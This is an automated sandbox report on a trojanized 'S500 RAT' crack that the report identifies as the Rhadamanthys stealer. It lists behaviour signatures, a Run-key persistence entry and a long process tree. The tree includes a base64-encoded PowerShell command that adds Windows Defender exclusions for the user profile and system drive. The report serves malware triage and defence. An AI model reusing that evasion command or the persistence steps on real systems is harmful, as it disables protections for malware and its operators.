Malware Analysis Report

2024-11-15 05:59

Sample ID 240404-s8exjabf9v
Target https://file.io/k3MVzAZvKJCU
Tags
rhadamanthys persistence pyinstaller stealer upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://file.io/k3MVzAZvKJCU was found to be: Known bad.

Malicious Activity Summary

rhadamanthys persistence pyinstaller stealer upx

Suspicious use of NtCreateUserProcessOtherParentProcess

Rhadamanthys

Executes dropped EXE

UPX packed file

Loads dropped DLL

Adds Run key to start application

Detects Pyinstaller

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

NTFS ADS

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-04 15:47

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-04 15:47

Reported

2024-04-04 15:49

Platform

win11-20240221-en

Max time kernel

128s

Max time network

132s

Command Line

sihost.exe

Signatures

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description | Indicator | Process | Target
PID 1616 created 2204 | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | C:\Windows\system32\sihost.exe

UPX packed file

upx
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-4181651180-3163410697-3990547336-1000\Software\Microsoft\Windows\CurrentVersion\Run\Update64 = "C:\\Users\\Admin\\explorer.exe" | C:\Users\Admin\explorer.exe | N/A

Detects Pyinstaller

pyinstaller
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A

Kills process with taskkill

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A

NTFS ADS

Description | Indicator | Process | Target
File opened for modification | C:\Users\Admin\Downloads\S500 RAT.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4072 wrote to memory of 4284 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 4384 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 2268 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4072 wrote to memory of 1680 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://file.io/k3MVzAZvKJCU

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd657e3cb8,0x7ffd657e3cc8,0x7ffd657e3cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1964 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2572 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4468 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2084 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6040 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6500 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6724 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6928 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7028 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7264 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7416 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6316 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8040 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7828 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8384 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8404 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8412 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8420 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8428 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8436 /prefetch:1

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004D8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10212 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10344 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9976 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7876 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9708 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=11028 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7396 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9856 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9760 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7748 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8660 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10004 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6396 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9712 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4600 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8980 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8136 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6416 /prefetch:1

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5796 /prefetch:8

C:\Users\Admin\Downloads\S500 RAT\S500 RAT\S500 RAT\S500 RAT\crack.exe

"C:\Users\Admin\Downloads\S500 RAT\S500 RAT\S500 RAT\S500 RAT\crack.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdwBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAZQBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAdQB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAegBlACMAPgA="

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\AppData\Roaming\explorer.exe

"C:\Users\Admin\AppData\Roaming\explorer.exe"

C:\Users\Admin\AppData\Roaming\explorer.exe

"C:\Users\Admin\AppData\Roaming\explorer.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\activate.bat

C:\Windows\system32\taskkill.exe

taskkill /f /im "explorer.exe"

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Users\Admin\explorer.exe

"explorer.exe"

C:\Users\Admin\explorer.exe

"explorer.exe"

